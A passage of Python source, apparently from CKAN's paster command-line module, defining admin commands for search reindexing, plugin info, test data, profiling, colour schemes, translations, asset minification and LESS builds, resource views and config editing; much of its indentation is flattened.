results = engine.execute(sql, start_date)
package_ids = set()
for row in results:
package_ids.add(row['package_id'])
total = len(package_ids)
not_found = 0
print('%i package index%s to be rebuilt starting from %s' % (total, '' if total < 2 else 'es', start_date))
from ckan.lib.search import rebuild
for package_id in package_ids:
try:
rebuild(package_id)
except logic.NotFound:
print("Error: package %s not found." % (package_id))
not_found += 1
except KeyboardInterrupt:
print("Stopped.")
return
except:
raise
print('search index rebuilding done.' + (' %i not found.' % (not_found) if not_found else ""))
class PluginInfo(CkanCommand):
'''Provide info on installed plugins.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 0
min_args = 0
def command(self):
self.get_info()
def get_info(self):
''' print info about current plugins from the .ini file'''
import ckan.plugins as p
self._load_config()
interfaces = {}
plugins = {}
for name in dir(p):
item = getattr(p, name)
try:
if issubclass(item, p.Interface):
interfaces[item] = {'class': item}
except TypeError:
pass
for interface in interfaces:
for plugin in p.PluginImplementations(interface):
name = plugin.name
if name not in plugins:
plugins[name] = {'doc': plugin.__doc__,
'class': plugin,
'implements': []}
plugins[name]['implements'].append(interface.__name__)
for plugin in plugins:
p = plugins[plugin]
print(plugin + ':')
print('-' * (len(plugin) + 1))
if p['doc']:
print(p['doc'])
print('Implements:')
for i in p['implements']:
extra = None
if i == 'ITemplateHelpers':
extra = self.template_helpers(p['class'])
if i == 'IActions':
extra = self.actions(p['class'])
print(' %s' % i)
if extra:
print(extra)
print()
def actions(self, cls):
''' Return readable action function info. '''
actions = cls.get_actions()
return self.function_info(actions)
def template_helpers(self, cls):
''' Return readable helper function info. '''
helpers = cls.get_helpers()
return self.function_info(helpers)
def function_info(self, functions):
''' Take a dict of functions and output readable info '''
import inspect
output = []
for function_name in functions:
fn = functions[function_name]
args_info = inspect.getargspec(fn)
params = args_info.args
num_params = len(params)
if args_info.varargs:
params.append('*' + args_info.varargs)
if args_info.keywords:
params.append('**' + args_info.keywords)
if args_info.defaults:
offset = num_params - len(args_info.defaults)
for i, v in enumerate(args_info.defaults):
params[i + offset] = params[i + offset] + '=' + repr(v)
# is this a classmethod if so remove the first parameter
if inspect.ismethod(fn) and inspect.isclass(fn.__self__):
params = params[1:]
params = ', '.join(params)
output.append(' %s(%s)' % (function_name, params))
# doc string
if fn.__doc__:
bits = fn.__doc__.split('\n')
for bit in bits:
output.append(' %s' % bit)
return ('\n').join(output)
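# Rough sketch of the output of `paster plugin-info` for a hypothetical plugin
# (the plugin name, helper and docstrings below are illustrative only):
#
#   my_plugin:
#   ----------
#   Adds example helpers.
#   Implements:
#       ITemplateHelpers
#           my_helper(value, default=None)
#               Return the value or the default.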
class CreateTestDataCommand(CkanCommand):
'''Create test data in the database.
Tests can also delete the created objects easily with the delete() method.
create-test-data - annakarenina and warandpeace
create-test-data search - realistic data to test search
create-test-data gov - government style data
create-test-data family - package relationships data
create-test-data user - create a user 'tester' with api key 'tester'
create-test-data translations - annakarenina, warandpeace, and some test
translations of terms
create-test-data vocabs - annakerenina, warandpeace, and some test
vocabularies
create-test-data hierarchy - hierarchy of groups
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
def command(self):
self._load_config()
from ckan import plugins
from create_test_data import CreateTestData
if self.args:
cmd = self.args[0]
else:
cmd = 'basic'
if self.verbose:
print('Creating %s test data' % cmd)
if cmd == 'basic':
CreateTestData.create_basic_test_data()
elif cmd == 'user':
CreateTestData.create_test_user()
print('Created user %r with password %r and apikey %r' %
('tester', 'tester', 'tester'))
elif cmd == 'search':
CreateTestData.create_search_test_data()
elif cmd == 'gov':
CreateTestData.create_gov_test_data()
elif cmd == 'family':
CreateTestData.create_family_test_data()
elif cmd == 'translations':
CreateTestData.create_translations_test_data()
elif cmd == 'vocabs':
CreateTestData.create_vocabs_test_data()
elif cmd == 'hierarchy':
CreateTestData.create_group_hierarchy_test_data()
else:
print('Command %s not recognized' % cmd)
raise NotImplementedError
if self.verbose:
print('Creating %s test data: Complete!' % cmd)
class Profile(CkanCommand):
'''Code speed profiler
Provide a ckan url and it will make the request and record
how long each function call took in a file that can be read
by pstats.Stats (command-line) or runsnakerun (gui).
Usage:
profile URL [username]
e.g. profile /data/search
The result is saved in ckan.data.search.profile
To view the profile in runsnakerun:
runsnakerun ckan.data.search.profile
You may need to install python module: cProfile
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 2
min_args = 1
def _load_config_into_test_app(self):
from paste.deploy import loadapp
import paste.fixture
if not self.options.config:
msg = 'No config file supplied'
raise self.BadCommand(msg)
self.filename = os.path.abspath(self.options.config)
if not os.path.exists(self.filename):
raise AssertionError('Config filename %r does not exist.' % self.filename)
fileConfig(self.filename)
wsgiapp = loadapp('config:' + self.filename)
self.app = paste.fixture.TestApp(wsgiapp)
def command(self):
self._load_config_into_test_app()
import paste.fixture
import cProfile
import re
url = self.args[0]
if self.args[1:]:
user = self.args[1]
else:
user = 'visitor'
def profile_url(url):
try:
res = self.app.get(url, status=[200],
extra_environ={'REMOTE_USER': user})
except paste.fixture.AppError:
print('App error: ', url.strip())
except KeyboardInterrupt:
raise
except Exception:
error(traceback.format_exc())
output_filename = 'ckan%s.profile' % re.sub('[/?]', '.', url.replace('/', '.'))
profile_command = "profile_url('%s')" % url
cProfile.runctx(profile_command, globals(), locals(), filename=output_filename)
import pstats
stats = pstats.Stats(output_filename)
stats.sort_stats('cumulative')
stats.print_stats(0.1) # show only top 10% of lines
print('Only top 10% of lines shown')
print('Written profile to: %s' % output_filename)
class CreateColorSchemeCommand(CkanCommand):
'''Create or remove a color scheme.
After running this, you'll need to regenerate the css files. See paster's less command for details.
color - creates a random color scheme
color clear - clears any color scheme
color <'HEX'> - uses the given value as the base color, eg '#ff00ff' (must be quoted).
color <VALUE> - a float between 0.0 and 1.0 used as base hue
color <COLOR_NAME> - html color name used for base color eg lightblue
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
rules = [
'@layoutLinkColor',
'@mastheadBackgroundColor',
'@btnPrimaryBackground',
'@btnPrimaryBackgroundHighlight',
]
# list of predefined colors
color_list = {
'aliceblue': '#f0f8ff',
'antiquewhite': '#faebd7',
'aqua': '#00ffff',
'aquamarine': '#7fffd4',
'azure': '#f0ffff',
'beige': '#f5f5dc',
'bisque': '#ffe4c4',
'black': '#000000',
'blanchedalmond': '#ffebcd',
'blue': '#0000ff',
'blueviolet': '#8a2be2',
'brown': '#a52a2a',
'burlywood': '#deb887',
'cadetblue': '#5f9ea0',
'chartreuse': '#7fff00',
'chocolate': '#d2691e',
'coral': '#ff7f50',
'cornflowerblue': '#6495ed',
'cornsilk': '#fff8dc',
'crimson': '#dc143c',
'cyan': '#00ffff',
'darkblue': '#00008b',
'darkcyan': '#008b8b',
'darkgoldenrod': '#b8860b',
'darkgray': '#a9a9a9',
'darkgrey': '#a9a9a9',
'darkgreen': '#006400',
'darkkhaki': '#bdb76b',
'darkmagenta': '#8b008b',
'darkolivegreen': '#556b2f',
'darkorange': '#ff8c00',
'darkorchid': '#9932cc',
'darkred': '#8b0000',
'darksalmon': '#e9967a',
'darkseagreen': '#8fbc8f',
'darkslateblue': '#483d8b',
'darkslategray': '#2f4f4f',
'darkslategrey': '#2f4f4f',
'darkturquoise': '#00ced1',
'darkviolet': '#9400d3',
'deeppink': '#ff1493',
'deepskyblue': '#00bfff',
'dimgray': '#696969',
'dimgrey': '#696969',
'dodgerblue': '#1e90ff',
'firebrick': '#b22222',
'floralwhite': '#fffaf0',
'forestgreen': '#228b22',
'fuchsia': '#ff00ff',
'gainsboro': '#dcdcdc',
'ghostwhite': '#f8f8ff',
'gold': '#ffd700',
'goldenrod': '#daa520',
'gray': '#808080',
'grey': '#808080',
'green': '#008000',
'greenyellow': '#adff2f',
'honeydew': '#f0fff0',
'hotpink': '#ff69b4',
'indianred ': '#cd5c5c',
'indigo ': '#4b0082',
'ivory': '#fffff0',
'khaki': '#f0e68c',
'lavender': '#e6e6fa',
'lavenderblush': '#fff0f5',
'lawngreen': '#7cfc00',
'lemonchiffon': '#fffacd',
'lightblue': '#add8e6',
'lightcoral': '#f08080',
'lightcyan': '#e0ffff',
'lightgoldenrodyellow': '#fafad2',
'lightgray': '#d3d3d3',
'lightgrey': '#d3d3d3',
'lightgreen': '#90ee90',
'lightpink': '#ffb6c1',
'lightsalmon': '#ffa07a',
'lightseagreen': '#20b2aa',
'lightskyblue': '#87cefa',
'lightslategray': '#778899',
'lightslategrey': '#778899',
'lightsteelblue': '#b0c4de',
'lightyellow': '#ffffe0',
'lime': '#00ff00',
'limegreen': '#32cd32',
'linen': '#faf0e6',
'magenta': '#ff00ff',
'maroon': '#800000',
'mediumaquamarine': '#66cdaa',
'mediumblue': '#0000cd',
'mediumorchid': '#ba55d3',
'mediumpurple': '#9370d8',
'mediumseagreen': '#3cb371',
'mediumslateblue': '#7b68ee',
'mediumspringgreen': '#00fa9a',
'mediumturquoise': '#48d1cc',
'mediumvioletred': '#c71585',
'midnightblue': '#191970',
'mintcream': '#f5fffa',
'mistyrose': '#ffe4e1',
'moccasin': '#ffe4b5',
'navajowhite': '#ffdead',
'navy': '#000080',
'oldlace': '#fdf5e6',
'olive': '#808000',
'olivedrab': '#6b8e23',
'orange': '#ffa500',
'orangered': '#ff4500',
'orchid': '#da70d6',
'palegoldenrod': '#eee8aa',
'palegreen': '#98fb98',
'paleturquoise': '#afeeee',
'palevioletred': '#d87093',
'papayawhip': '#ffefd5',
'peachpuff': '#ffdab9',
'peru': '#cd853f',
'pink': '#ffc0cb',
'plum': '#dda0dd',
'powderblue': '#b0e0e6',
'purple': '#800080',
'red': '#ff0000',
'rosybrown': '#bc8f8f',
'royalblue': '#4169e1',
'saddlebrown': '#8b4513',
'salmon': '#fa8072',
'sandybrown': '#f4a460',
'seagreen': '#2e8b57',
'seashell': '#fff5ee',
'sienna': '#a0522d',
'silver': '#c0c0c0',
'skyblue': '#87ceeb',
'slateblue': '#6a5acd',
'slategray': '#708090',
'slategrey': '#708090',
'snow': '#fffafa',
'springgreen': '#00ff7f',
'steelblue': '#4682b4',
'tan': '#d2b48c',
'teal': '#008080',
'thistle': '#d8bfd8',
'tomato': '#ff6347',
'turquoise': '#40e0d0',
'violet': '#ee82ee',
'wheat': '#f5deb3',
'white': '#ffffff',
'whitesmoke': '#f5f5f5',
'yellow': '#ffff00',
'yellowgreen': '#9acd32',
}
def create_colors(self, hue, num_colors=5, saturation=None, lightness=None):
    ''' Create n related colours '''
    import math
    import colorsys
    if saturation is None:
        saturation = 0.9
    if lightness is None:
        lightness = 40
    else:
        lightness *= 100
    saturation -= math.trunc(saturation)
    print(hue, saturation)
    colors = []
    for i in range(num_colors):
ix = i * (1.0/num_colors)
_lightness = (lightness + (ix * 40))/100.
if _lightness > 1.0:
_lightness = 1.0
color = colorsys.hls_to_rgb(hue, _lightness, saturation)
hex_color = '#'
for part in color:
hex_color += '%02x' % int(part * 255)
# check and remove any bad values
if not re.match('^\#[0-9a-f]{6}$', hex_color):
hex_color = '#FFFFFF'
colors.append(hex_color)
return colors
def command(self):
hue = None
saturation = None
lightness = None
public = config.get(u'ckan.base_public_folder')
path = os.path.dirname(__file__)
path = os.path.join(path, '..', public, 'base', 'less', 'custom.less')
if self.args:
arg = self.args[0]
rgb = None
if arg == 'clear':
os.remove(path)
print('custom colors removed.')
elif arg.startswith('#'):
color = arg[1:]
if len(color) == 3:
rgb = [int(x, 16) * 16 for x in color]
elif len(color) == 6:
rgb = [int(x, 16) for x in re.findall('..', color)]
else:
print('ERROR: invalid color')
elif arg.lower() in self.color_list:
color = self.color_list[arg.lower()][1:]
rgb = [int(x, 16) for x in re.findall('..', color)]
else:
try:
hue = float(self.args[0])
except ValueError:
print('ERROR argument `%s` not recognised' % arg)
if rgb:
import colorsys
hue, lightness, saturation = colorsys.rgb_to_hls(*rgb)
lightness = lightness / 340
# deal with greys
if not (hue == 0.0 and saturation == 0.0):
saturation = None
else:
import random
hue = random.random()
if hue is not None:
f = open(path, 'w')
colors = self.create_colors(hue, saturation=saturation, lightness=lightness)
for i in range(len(self.rules)):
f.write('%s: %s;\n' % (self.rules[i], colors[i]))
print('%s: %s;\n' % (self.rules[i], colors[i]))
f.close()
print('Color scheme has been created.')
print('Make sure less is run for changes to take effect.')
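# Illustration of the generated custom.less (one line per entry in `rules`;
# the hex values below are made up, the real ones come from create_colors()):
#
#   @layoutLinkColor: #3b6ea5;
#   @mastheadBackgroundColor: #4d80b7;
#   @btnPrimaryBackground: #608fc9;
#   @btnPrimaryBackgroundHighlight: #72a1db;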
class TranslationsCommand(CkanCommand):
'''Translation helper functions
trans js - generate the javascript translations
trans mangle - mangle the zh_TW translations for testing
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 1
def command(self):
self._load_config()
from ckan.common import config
from ckan.lib.i18n import build_js_translations
ckan_path = os.path.join(os.path.dirname(__file__), '..')
self.i18n_path = config.get('ckan.i18n_directory',
os.path.join(ckan_path, 'i18n'))
command = self.args[0]
if command == 'mangle':
self.mangle_po()
elif command == 'js':
build_js_translations()
else:
print('command not recognised')
def mangle_po(self):
''' This will mangle the zh_TW translations for translation coverage
testing.
NOTE: This will destroy the current translations for zh_TW
'''
import polib
pot_path = os.path.join(self.i18n_path, 'ckan.pot')
po = polib.pofile(pot_path)
# we don't want to mangle the following items in strings
# %(...)s %s %0.3f %1$s %2$0.3f [1:...] {...} etc
# sprintf bit after %
spf_reg_ex = "\+?(0|'.)?-?\d*(.\d*)?[\%bcdeufosxX]"
extract_reg_ex = '(\%\([^\)]*\)' + spf_reg_ex + \
'|\[\d*\:[^\]]*\]' + \
'|\{[^\}]*\}' + \
'|<[^>}]*>' + \
'|\%((\d)*\$)?' + spf_reg_ex + ')'
for entry in po:
msg = entry.msgid.encode('utf-8')
matches = re.finditer(extract_reg_ex, msg)
length = len(msg)
position = 0
translation = u''
for match in matches:
translation += '-' * (match.start() - position)
position = match.end()
translation += match.group(0)
translation += '-' * (length - position)
entry.msgstr = translation
out_dir = os.path.join(self.i18n_path, 'zh_TW', 'LC_MESSAGES')
try:
os.makedirs(out_dir)
except OSError:
pass
po.metadata['Plural-Forms'] = "nplurals=1; plural=0\n"
out_po = os.path.join(out_dir, 'ckan.po')
out_mo = os.path.join(out_dir, 'ckan.mo')
po.save(out_po)
po.save_as_mofile(out_mo)
print('zh_TW has been mangled')
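# Rough illustration of a mangled entry (dash counts are approximate; the
# sprintf/replacement placeholders are kept, everything else becomes '-'):
#
#   msgid  "Showing datasets %(first)s - %(last)s"
#   msgstr "-----------------%(first)s---%(last)s"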
class MinifyCommand(CkanCommand):
'''Create minified versions of the given Javascript and CSS files.
Usage:
paster minify [--clean] PATH
for example:
paster minify ckan/public/base
paster minify ckan/public/base/css/*.css
paster minify ckan/public/base/css/red.css
if the --clean option is provided any minified files will be removed.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 1
exclude_dirs = ['vendor']
def __init__(self, name):
super(MinifyCommand, self).__init__(name)
self.parser.add_option('--clean', dest='clean',
action='store_true', default=False,
help='remove any minified files in the path')
def command(self):
clean = getattr(self.options, 'clean', False)
self._load_config()
for base_path in self.args:
if os.path.isfile(base_path):
if clean:
self.clear_minifyed(base_path)
else:
self.minify_file(base_path)
elif os.path.isdir(base_path):
for root, dirs, files in os.walk(base_path):
dirs[:] = [d for d in dirs if not d in self.exclude_dirs]
for filename in files:
path = os.path.join(root, filename)
if clean:
self.clear_minifyed(path)
else:
self.minify_file(path)
else:
# Path is neither a file nor a dir; skip it.
continue
def clear_minifyed(self, path):
path_only, extension = os.path.splitext(path)
if extension not in ('.css', '.js'):
# This is not a js or css file.
return
if path_only.endswith('.min'):
print('removing %s' % path)
os.remove(path)
def minify_file(self, path):
'''Create the minified version of the given file.
If the file is not a .js or .css file (e.g. it's a .min.js or .min.css
file, or it's some other type of file entirely) it will not be
minified.
:param path: The path to the .js or .css file to minify
'''
import ckan.lib.fanstatic_resources as fanstatic_resources
path_only, extension = os.path.splitext(path)
if path_only.endswith('.min'):
# This is already a minified file.
return
if extension not in ('.css', '.js'):
# This is not a js or css file.
return
path_min = fanstatic_resources.min_path(path)
source = open(path, 'r').read()
f = open(path_min, 'w')
if path.endswith('.css'):
f.write(rcssmin.cssmin(source))
elif path.endswith('.js'):
f.write(rjsmin.jsmin(source))
f.close()
print("Minified file '{0}'".format(path))
class LessCommand(CkanCommand):
'''Compile all root less documents into their CSS counterparts
Usage:
paster less
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 0
def command(self):
self._load_config()
self.less()
custom_css = {
'fuchsia': '''
@layoutLinkColor: #E73892;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'green': '''
@layoutLinkColor: #2F9B45;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'red': '''
@layoutLinkColor: #C14531;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'maroon': '''
@layoutLinkColor: #810606;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
}
def less(self):
''' Compile less files '''
import subprocess
command = 'npm bin'
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
output = process.communicate()
directory = output[0].strip()
less_bin = os.path.join(directory, 'lessc')
public = config.get(u'ckan.base_public_folder')
root = os.path.join(os.path.dirname(__file__), '..', public, 'base')
root = os.path.abspath(root)
custom_less = os.path.join(root, 'less', 'custom.less')
for color in self.custom_css:
f = open(custom_less, 'w')
f.write(self.custom_css[color])
f.close()
self.compile_less(root, less_bin, color)
f = open(custom_less, 'w')
f.write('// This file is needed in order for ./bin/less to compile in less 1.3.1+\n')
f.close()
self.compile_less(root, less_bin, 'main')
def compile_less(self, root, less_bin, color):
import subprocess
for dir_prefix in ['', '-rtl']:
print('compile %s.css' % (color + dir_prefix))
main_less = os.path.join(root, 'less', 'main%s.less' % dir_prefix)
main_css = os.path.join(root, 'css', '%s.css' % (color + dir_prefix))
command = '%s %s %s' % (less_bin, main_less, main_css)
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
output = process.communicate()
print(output)
class FrontEndBuildCommand(CkanCommand):
'''Creates and minifies css and JavaScript files
Usage:
paster front-end-build
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 0
def command(self):
self._load_config()
# Less css
cmd = LessCommand('less')
cmd.options = self.options
cmd.command()
# js translation strings
cmd = TranslationsCommand('trans')
cmd.options = self.options
cmd.args = ('js',)
cmd.command()
# minification
cmd = MinifyCommand('minify')
cmd.options = self.options
public = config.get(u'ckan.base_public_folder')
root = os.path.join(os.path.dirname(__file__), '..', public, 'base')
root = os.path.abspath(root)
ckanext = os.path.join(os.path.dirname(__file__), '..', '..', 'ckanext')
ckanext = os.path.abspath(ckanext)
cmd.args = (root, ckanext)
cmd.command()
class ViewsCommand(CkanCommand):
'''Manage resource views.
Usage:
paster views create [options] [type1] [type2] ...
Create views on relevant resources. You can optionally provide
specific view types (eg `recline_view`, `image_view`). If no types
are provided, the default ones will be used. These are generally
the ones defined in the `ckan.views.default_views` config option.
Note that in either case, plugins must be loaded (ie added to
`ckan.plugins`), otherwise the command will stop.
paster views clear [options] [type1] [type2] ...
Permanently delete all views or the ones with the provided types.
paster views clean
Permanently delete views for all types no longer present in the
`ckan.plugins` configuration option.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 1
def __init__(self, name):
super(ViewsCommand, self).__init__(name)
self.parser.add_option('-y', '--yes', dest='assume_yes',
action='store_true',
default=False,
help='''Automatic yes to prompts. Assume "yes"
as answer to all prompts and run non-interactively''')
self.parser.add_option('-d', '--dataset', dest='dataset_id',
action='append',
help='''Create views on a particular dataset.
You can use the dataset id or name, and it can be defined multiple times.''')
self.parser.add_option('--no-default-filters',
dest='no_default_filters',
action='store_true',
default=False,
help='''Do not add default filters for relevant
resource formats for the view types provided. Note that filters are not added
by default anyway if an unsupported view type is provided or when using the
`-s` or `-d` options.''')
self.parser.add_option('-s', '--search', dest='search_params',
action='store',
default=False,
help='''Extra search parameters that will be
used for getting the datasets to create the resource views on. It must be a
JSON object like the one used by the `package_search` API call. Supported
fields are `q`, `fq` and `fq_list`. Check the documentation for examples.
Not used when using the `-d` option.''')
def command(self):
self._load_config()
if not self.args:
print(self.usage)
elif self.args[0] == 'create':
view_plugin_types = self.args[1:]
self.create_views(view_plugin_types)
elif self.args[0] == 'clear':
view_plugin_types = self.args[1:]
self.clear_views(view_plugin_types)
elif self.args[0] == 'clean':
self.clean_views()
else:
print(self.usage)
_page_size = 100
def _get_view_plugins(self, view_plugin_types,
get_datastore_views=False):
'''
Returns the view plugins that were successfully loaded
Views are provided as a list of ``view_plugin_types``. If no types are
provided, the default views defined in the ``ckan.views.default_views``
will be created. Only in this case (when the default view plugins are
used) can the `get_datastore_views` parameter be used to also return view
plugins that require data to be in the DataStore.
If any of the provided plugins could not be loaded (eg it was not added
to `ckan.plugins`) the command will stop.
Returns a list of loaded plugin names.
'''
from ckan.lib.datapreview import (get_view_plugins,
get_default_view_plugins
)
log = logging.getLogger(__name__)
view_plugins = []
if not view_plugin_types:
log.info('No view types provided, using default types')
view_plugins = get_default_view_plugins()
if get_datastore_views:
view_plugins.extend(
get_default_view_plugins(get_datastore_views=True))
else:
view_plugins = get_view_plugins(view_plugin_types)
loaded_view_plugins = [view_plugin.info()['name']
for view_plugin in view_plugins]
plugins_not_found = list(set(view_plugin_types) -
set(loaded_view_plugins))
if plugins_not_found:
error('View plugin(s) not found : {0}. '.format(plugins_not_found)
+ 'Have they been added to the `ckan.plugins` configuration'
+ ' option?')
return loaded_view_plugins
def _add_default_filters(self, search_data_dict, view_types):
'''
Adds extra filters to the `package_search` dict for common view types
It basically adds `fq` parameters that filter relevant resource formats
for the view types provided. For instance, if one of the view types is
`pdf_view` the following will be added to the final query:
fq=res_format:"pdf" OR res_format:"PDF"
This obviously should only be used if all view types are known and can
be filtered, otherwise we want all datasets to be returned. If a
non-filterable view type is provided, the search params are not
modified.
Returns the provided data_dict for `package_search`, optionally
modified with extra filters.
'''
from ckanext.imageview.plugin import DEFAULT_IMAGE_FORMATS
from ckanext.textview.plugin import get_formats as get_text_formats
from ckanext.datapusher.plugin import DEFAULT_FORMATS as \
datapusher_formats
filter_formats = []
for view_type in view_types:
if view_type == 'image_view':
for _format in DEFAULT_IMAGE_FORMATS:
filter_formats.extend([_format, _format.upper()])
elif view_type == 'text_view':
formats = get_text_formats(config)
for _format in itertools.chain.from_iterable(formats.values()):
filter_formats.extend([_format, _format.upper()])
elif view_type == 'pdf_view':
filter_formats.extend(['pdf', 'PDF'])
elif view_type in ['recline_view', 'recline_grid_view',
'recline_graph_view', 'recline_map_view']:
if datapusher_formats[0] in filter_formats:
continue
for _format in datapusher_formats:
if '/' not in _format:
filter_formats.extend([_format, _format.upper()])
else:
# There is another view type provided so we can't add any
# filter
return search_data_dict
filter_formats_query = ['+res_format:"{0}"'.format(_format)
for _format in filter_formats]
search_data_dict['fq_list'].append(' OR '.join(filter_formats_query))
return search_data_dict
def _update_search_params(self, search_data_dict):
'''
Update the `package_search` data dict with the user provided parameters
Supported fields are `q`, `fq` and `fq_list`.
If the provided JSON object can not be parsed the process stops with
an error.
Returns the updated data dict
'''
log = logging.getLogger(__name__)
if not self.options.search_params:
return search_data_dict
try:
user_search_params = json.loads(self.options.search_params)
except ValueError as e:
error('Unable to parse JSON search parameters: {0}'.format(e))
if user_search_params.get('q'):
search_data_dict['q'] = user_search_params['q']
if user_search_params.get('fq'):
if search_data_dict['fq']:
search_data_dict['fq'] += ' ' + user_search_params['fq']
else:
search_data_dict['fq'] = user_search_params['fq']
if (user_search_params.get('fq_list') and
isinstance(user_search_params['fq_list'], list)):
search_data_dict['fq_list'].extend(user_search_params['fq_list'])
def _search_datasets(self, page=1, view_types=[]):
'''
Perform a query with `package_search` and return the result
Results can be paginated using the `page` parameter
'''
n = self._page_size
search_data_dict = {
'q': '',
'fq': '',
'fq_list': [],
'include_private': True,
'rows': n,
'start': n * (page - 1),
}
if self.options.dataset_id:
search_data_dict['q'] = ' OR '.join(
['id:{0} OR name:"{0}"'.format(dataset_id)
for dataset_id in self.options.dataset_id]
)
elif self.options.search_params:
self._update_search_params(search_data_dict)
elif not self.options.no_default_filters:
self._add_default_filters(search_data_dict, view_types)
if not search_data_dict.get('q'):
search_data_dict['q'] = '*:*'
query = p.toolkit.get_action('package_search')(
{}, search_data_dict)
return query
def create_views(self, view_plugin_types=[]):
from ckan.lib.datapreview import add_views_to_dataset_resources
log = logging.getLogger(__name__)
datastore_enabled = 'datastore' in config['ckan.plugins'].split()
loaded_view_plugins = self._get_view_plugins(view_plugin_types,
datastore_enabled)
context = {'user': self.site_user['name']}
page = 1
while True:
query = self._search_datasets(page, loaded_view_plugins)
if page == 1 and query['count'] == 0:
error('No datasets to create resource views on, exiting...')
elif page == 1 and not self.options.assume_yes:
msg = ('\nYou are about to check {0} datasets for the ' +
'following view plugins: {1}\n' +
' Do you want to continue?')
confirm = query_yes_no(msg.format(query['count'],
loaded_view_plugins))
if confirm == 'no':
error('Command aborted by user')
if query['results']:
for dataset_dict in query['results']:
if not dataset_dict.get('resources'):
continue
views = add_views_to_dataset_resources(
context,
dataset_dict,
view_types=loaded_view_plugins)
if views:
view_types = list(set([view['view_type']
for view in views]))
msg = ('Added {0} view(s) of type(s) {1} to ' +
'resources from dataset {2}')
log.debug(msg.format(len(views),
', '.join(view_types),
dataset_dict['name']))
if len(query['results']) < self._page_size:
break
page += 1
else:
break
log.info('Done')
def clear_views(self, view_plugin_types=[]):
log = logging.getLogger(__name__)
if not self.options.assume_yes:
if view_plugin_types:
msg = 'Are you sure you want to delete all resource views ' + \
'of type {0}?'.format(', '.join(view_plugin_types))
else:
msg = 'Are you sure you want to delete all resource views?'
result = query_yes_no(msg, default='no')
if result == 'no':
error('Command aborted by user')
context = {'user': self.site_user['name']}
logic.get_action('resource_view_clear')(
context, {'view_types': view_plugin_types})
log.info('Done')
def clean_views(self):
names = []
for plugin in p.PluginImplementations(p.IResourceView):
names.append(str(plugin.info()['name']))
results = model.ResourceView.get_count_not_in_view_types(names)
if not results:
print('No resource views to delete')
return
print('This command will delete the following resource views:\n')
for row in results:
print('%s of type %s' % (row[1], row[0]))
result = query_yes_no('Do you want to delete these resource views:', default='no')
if result == 'no':
print('Not Deleting.')
return
model.ResourceView.delete_not_in_view_types(names)
model.Session.commit()
print('Deleted resource views.')
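# Example invocations (the dataset name, config path and search JSON are
# hypothetical):
#
#   paster views create image_view -d my-dataset -c /etc/ckan/default/production.ini
#   paster views create -s '{"fq": "res_format:CSV"}' -c /etc/ckan/default/production.ini
#   paster views clean -y -c /etc/ckan/default/production.ini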
class ConfigToolCommand(paste.script.command.Command):
'''Tool for editing options in a CKAN config file
paster config-tool <default.ini> <key>=<value> [<key>=<value> ...]
paster config-tool <default.ini> -f <custom_options.ini>
Examples:
paster config-tool default.ini sqlalchemy.url=123 'ckan.site_title=ABC'
paster config-tool default.ini -s server:main -e port=8080
paster config-tool default.ini -f custom_options.ini
'''
parser = paste.script.command.Command.standard_parser(verbose=True)
default_verbosity = 1
group_name = 'ckan'
usage = __doc__
summary = usage.split('\n')[0]
parser.add_option('-s', '--section', dest='section',
default='app:main', help='Section of the config file')
parser.add_option(
'-e', '--edit', action='store_true', dest='edit', default=False,
help='Checks the option already exists in the config file')
parser.add_option(
'-f', '--file', dest='merge_filepath', metavar='FILE',
help='Supply an options file to merge in')
def command(self):
import config_tool
if len(self.args) < 1:
self.parser.error('Not enough arguments (got %i, need at least 1)'
% len(self.args))
config_filepath = self.args[0]
if not os.path.exists(config_filepath):
self.parser.error('Config filename %r does not exist.' %
config_filepath)
if self.options.merge_filepath:
config_tool.config_edit_using_merge_file(
config_filepath, self.options.merge_filepath)
options = self.args[1:]
if not (options or self.options.merge_filepath):
self.parser.error('No options provided')
if options:
for option in options:
if '=' not in option:
error(
'An option does not have an equals sign: %r '
'It should be \'key=value\'. If there are spaces '
'you\'ll need to quote the option.\n' % option)
try:
config_tool.config_edit_using_option_strings(
config_filepath, options, self.options.section,
edit=self.options.edit)
except config_tool.ConfigToolError as e:
error(traceback.format_exc())
class JobsCommand(CkanCommand):
'''Manage background jobs
Usage:
paster jobs worker [--burst] [QUEUES]
Start a worker that fetches jobs from queues and executes
them. If no queue names are given then the worker listens
to the default queue, this is equivalent to
paster jobs worker default
If queue names are given then the worker listens to those
queues and only those:
paster jobs worker my-custom-queue
Hence, if you want the worker to listen to the default queue
and some others then you must list the default queue explicitly:
paster jobs worker default my-custom-queue
If the `--burst` option is given then the worker will exit
as soon as all its queues are empty.
paster jobs list [QUEUES]
List currently enqueued jobs from the given queues. If no queue
names are given then the jobs from all queues are listed.
paster jobs show ID
Show details about a specific job.
paster jobs cancel ID
